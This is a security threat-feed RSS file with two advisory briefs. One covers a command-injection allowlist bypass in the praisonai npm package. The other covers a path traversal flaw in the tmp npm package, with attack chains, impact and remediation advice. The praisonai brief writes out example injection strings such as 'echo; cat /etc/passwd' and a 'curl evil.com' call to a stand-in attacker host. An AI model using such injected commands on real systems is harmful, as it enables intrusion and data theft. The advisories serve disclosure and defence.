<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Npm Package - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/npm-package/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Thu, 18 Jun 2026 15:03:35 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/npm-package/feed.xml" rel="self" type="application/rss+xml"/><item><title>npm PraisonAI utility-tools.shell() Allowlist Bypass via Shell Chaining (GHSA-5jv7-2mjm-h6qj)</title><link>https://feed.craftedsignal.io/briefs/2026-06-praisonai-shell-bypass/</link><pubDate>Thu, 18 Jun 2026 15:03:35 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-06-praisonai-shell-bypass/</guid><description>The npm package `praisonai` versions 1.5.1 through 1.7.1 contains a command injection vulnerability (GHSA-5jv7-2mjm-h6qj) in its `utility-tools.shell()` helper, which allows attackers to bypass a 'safe read-only' command allowlist by appending arbitrary shell commands with metacharacters after an allowed command, leading to arbitrary code execution with the PraisonAI process privileges.</description><content:encoded><![CDATA[<p>The npm package <code>praisonai</code> has been identified with a command injection vulnerability (GHSA-5jv7-2mjm-h6qj) affecting versions 1.5.1 through 1.7.1. The <code>utility-tools.shell()</code> helper, located in <code>dist/tools/utility-tools.js</code>, is designed to execute &quot;safe read-only commands&quot; by checking only the first whitespace-delimited token against an allowlist (e.g., <code>ls</code>, <code>cat</code>, <code>echo</code>). However, the function then passes the entire input string to Node.js's <code>child_process.exec()</code>, which executes it via a system shell. This policy/parser differential allows an attacker to prefix a malicious command with an allowed command and shell metacharacters (e.g., <code>echo ok; malicious_command</code>), bypassing the intended allowlist and executing arbitrary commands with the PraisonAI process's privileges. This flaw enables potential file system access, network exfiltration, or denial of service within applications using this vulnerable library.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access</strong>: An attacker identifies an application or service that integrates the <code>praisonai</code> library (versions 1.5.1-1.7.1) and exposes functionality that processes user-controlled input through the vulnerable <code>utility-tools.shell()</code> helper.</li>
<li><strong>Command Crafting</strong>: The attacker crafts a malicious command string. This string starts with a command found in <code>utility-tools.shell()</code>'s <code>safeCommands</code> allowlist (e.g., <code>echo</code>, <code>ls</code>) followed by a shell metacharacter (e.g., <code>;</code>, <code>&amp;&amp;</code>, <code>|</code>) and the desired arbitrary command (e.g., <code>cat /etc/passwd</code>, <code>curl evil.com</code>).</li>
<li><strong>Vulnerable Function Call</strong>: The crafted malicious command string is submitted as input to the vulnerable application. The application, in turn, passes this string to the <code>praisonai</code>'s <code>utility-tools.shell()</code> function.</li>
<li><strong>Allowlist Check Bypass</strong>: The <code>utility-tools.shell()</code> function performs its safety check by splitting the input string by whitespace and validating only the <em>first token</em> (e.g., <code>echo</code>) against its internal <code>safeCommands</code> allowlist. Since the first token is allowed, the check passes.</li>
<li><strong>Shell Execution</strong>: The function proceeds to pass the <em>entire, unaltered malicious command string</em> (e.g., <code>echo; cat /etc/passwd</code>) to Node.js's <code>child_process.exec()</code>.</li>
<li><strong>Arbitrary Command Execution</strong>: <code>child_process.exec()</code> invokes the system's default shell (e.g., <code>sh -c</code> on Linux, <code>cmd.exe /c</code> on Windows), which interprets the full string. The shell executes the initial allowed command, then, upon encountering the shell metacharacter, proceeds to execute the appended arbitrary command (e.g., <code>cat /etc/passwd</code>).</li>
<li><strong>Impact</strong>: The arbitrary command is executed with the privileges of the PraisonAI application process, potentially leading to sensitive data exposure, file modification, network communication, or system disruption, depending on the command and process context.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>If an application or service exposes the vulnerable <code>utility-tools.shell()</code> helper to untrusted input, the safe-command allowlist becomes ineffective. Attackers can execute arbitrary shell commands with the PraisonAI process privileges. The specific consequences are determined by the embedding application's context and permissions, but can include unauthorized reading of sensitive files and secrets (e.g., credentials, configuration files), modification of files or application state, invocation of local tools, network exfiltration of data if egress is permitted, and denial of service through resource-intensive commands. While no specific victim numbers are available, the broad applicability of Node.js applications means any sector using <code>praisonai</code> between versions 1.5.1 and 1.7.1 could be affected.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li><strong>Patch Vulnerable Library</strong>: Immediately update <code>praisonai</code> to a version higher than 1.7.1 (or explicitly prior to 1.5.1) to address GHSA-5jv7-2mjm-h6qj. The advisory suggests avoiding <code>exec(command)</code> for policy-checked strings and instead using <code>execFile()</code> or <code>spawn()</code> with <code>shell: false</code>.</li>
<li><strong>Deploy Detection Rules</strong>: Implement the provided Sigma rules to detect patterns indicative of this exploitation on both Linux/macOS and Windows hosts that run Node.js applications.</li>
<li><strong>Review Code for Vulnerable Usage</strong>: Developers should review their codebase for any instances where <code>praisonai/dist/tools/utility-tools.js</code> is imported and its <code>shell()</code> function is called with user-controlled input. Refactor such calls to ensure input is properly sanitized or leverage safer alternatives as described in the &quot;Suggested Fix&quot; section of the advisory (GHSA-5jv7-2mjm-h6qj).</li>
<li><strong>Enable Detailed Process Logging</strong>: Ensure <code>process_creation</code> logging (e.g., via Sysmon on Windows, Auditd/eBPF on Linux) is enabled and configured to capture full command lines, parent-child process relationships, and image paths to effectively utilize the provided Sigma rules.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>npm-package</category><category>nodejs</category><category>rce</category><category>allowlist-bypass</category><category>ghsa</category></item><item><title>tmp NPM Package Path Traversal Vulnerability (CVE-2026-44705)</title><link>https://feed.craftedsignal.io/briefs/2026-05-tmp-path-traversal/</link><pubDate>Wed, 27 May 2026 00:36:17 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-tmp-path-traversal/</guid><description>The tmp npm package contains a path traversal vulnerability (CVE-2026-44705) that allows writing files outside the intended temporary directory when untrusted data flows into the `prefix`, `postfix`, or `dir` options, leading to arbitrary file creation.</description><content:encoded><![CDATA[<p>The <code>tmp</code> npm package is vulnerable to path traversal due to insufficient input sanitization in its file and directory creation functions. By manipulating the <code>prefix</code>, <code>postfix</code>, or <code>dir</code> options, an attacker can write files to arbitrary locations on the file system. This is achieved by including traversal sequences (e.g., <code>../</code>) or absolute paths in these options, bypassing the intended temporary directory. The vulnerability affects applications that pass user-controlled data to <code>tmp</code>'s file/directory creation functions without proper validation, allowing an attacker to create or overwrite files with the privileges of the running process. This can lead to web application configuration poisoning, cache poisoning, or other security bypasses. The affected versions are all versions prior to the fix. This was reported by Mapta / BugBunny_ai.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts malicious input containing path traversal sequences (e.g., <code>../</code>) within the <code>prefix</code>, <code>postfix</code>, or <code>dir</code> options of the <code>tmp</code> package's functions.</li>
<li>The application, without proper sanitization, passes this attacker-controlled input to the <code>tmp.file()</code> or <code>tmp.dir()</code> functions.</li>
<li>The <code>tmp</code> package constructs a file path by concatenating the <code>tmpdir</code>, <code>dir</code>, <code>prefix</code>, and <code>postfix</code> options.</li>
<li>The <code>path.join()</code> function normalizes the path, resolving the traversal sequences and potentially allowing the final path to escape the intended temporary directory.</li>
<li>The <code>tmp</code> package attempts to create a file or directory at the constructed path using <code>fs.writeFileSync()</code> or similar functions.</li>
<li>Due to the path traversal, the file or directory is created outside the intended temporary directory, potentially in a sensitive location.</li>
<li>Depending on the attacker's chosen location, they can achieve effects such as web application configuration poisoning or cache poisoning.</li>
<li>The attacker gains unauthorized access or control over the application or system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to create files outside the intended temporary directories, leading to arbitrary file creation with the privileges of the running process. This can result in various attack scenarios, including web application configuration poisoning, cache poisoning, build pipeline compromise, container escape attempts, and multi-tenant service bypass. For instance, an attacker could overwrite application configuration files, inject malicious code into cached content, or gain access to sensitive data. The vulnerability has a CVSS v3.1 score of 8.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L).</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement input validation and sanitization for the <code>prefix</code>, <code>postfix</code>, and <code>dir</code> options before passing them to the <code>tmp.file()</code> or <code>tmp.dir()</code> functions, as described in the Remediation section of this brief.</li>
<li>Monitor for file creation events outside expected temporary directories using file system monitoring tools, as demonstrated in the Detection and Monitoring section of this brief.</li>
<li>Deploy the Sigma rule &quot;Detect Suspicious tmp NPM Package Path Traversal via Prefix/Postfix&quot; to identify exploitation attempts by detecting path traversal sequences in process command lines.</li>
<li>Apply the safe TmpFile workaround described in the Remediation section to strip out unsafe characters.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>path traversal</category><category>npm package</category><category>tmp</category></item></channel></rss>